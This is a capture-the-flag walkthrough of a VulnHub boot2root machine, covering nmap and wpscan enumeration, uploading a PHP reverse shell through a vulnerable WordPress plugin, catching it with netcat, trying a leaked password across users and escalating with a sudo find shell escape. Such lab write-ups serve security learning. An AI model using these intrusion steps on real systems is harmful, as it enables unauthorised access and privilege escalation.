In this article we are going to solve another boot2root challenge This is an intermediate level machine and requires good enumeration skills . we can download this machine from vulnhub . Please make sure that you download the updated version of the machine from the google drive link given here
As usual our first step is to find the IP address of the machine using the command : sudo netdiscover -i wlan0
we have the IP address of the target machine now we used the command : sudo nmap -A 192.168.43.97 to check for the open ports.
only two ports are open , so we decided to browse HTTP service . one thing is clear by this result that to gain access to this system we must enumerate the port 80 very carefully and should focus on each and every result.
when we open the website we have apache server home page that means we are inside the directory /var/www/html/ . Now we decided to do directory bruteforce but failed to find any useful directory . So we again go through the home page and found this line.
as said in the first line that there is directory at /var/www/html/g@web , So it is clear that g@web is directory and if we open the url http://192.168.43.97/g@web then we have a WordPress website.
without wasting our time we fire up wpscan using the command : sudo wpscan --url http://192.168.43.97/g@web
as we can see we have a outdated plugin and there are high chances of exploiting this , so we take the help of the internet and found a exploit that lets us to upload .phtml file (.phtml is used for php2). You can find the link at the end of this article to download the exploit .
now by using this exploit we can upload a .phtml file and can have the reverse shell.
here we are using the pentest monkey php reverse shell and saved it as shell.phtml .
now by clicking the submit button we have successfully uploaded the shell and can run it from http://192.168.43.97/g@web/wp-content/uploads/wpsp/
start the listener on the port we have specified in the .phtml file using the command : nc -nvlp port , in my case it is nc -nvlp 1234
now we have the shell of user www-data , we change our directory to /home and there we found 3 users, security hunter hackNos-boat .
now we need password to login as any of these users . so we again run the wpcan but with some extra option this time , command used : sudo wpscan --url http://192.168.43.97/g@web --enumerate u
if we open the URL specified in the output then we got a hint .
we can use hackNos@9012!! as the password for one of the users.
so now we have these 3 combination that we can try to login as one of these users.
hunter : hackNos@9012!!
hackNos-boat : hackNos@9012!!
security : hackNos@9012!!
and we succeed in login as user security .
now we without wasting our time we use the command sudo -l to check for sudo privileges .
and that's what we want now by using the find trick described in the gtfobins we run the command by : sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \;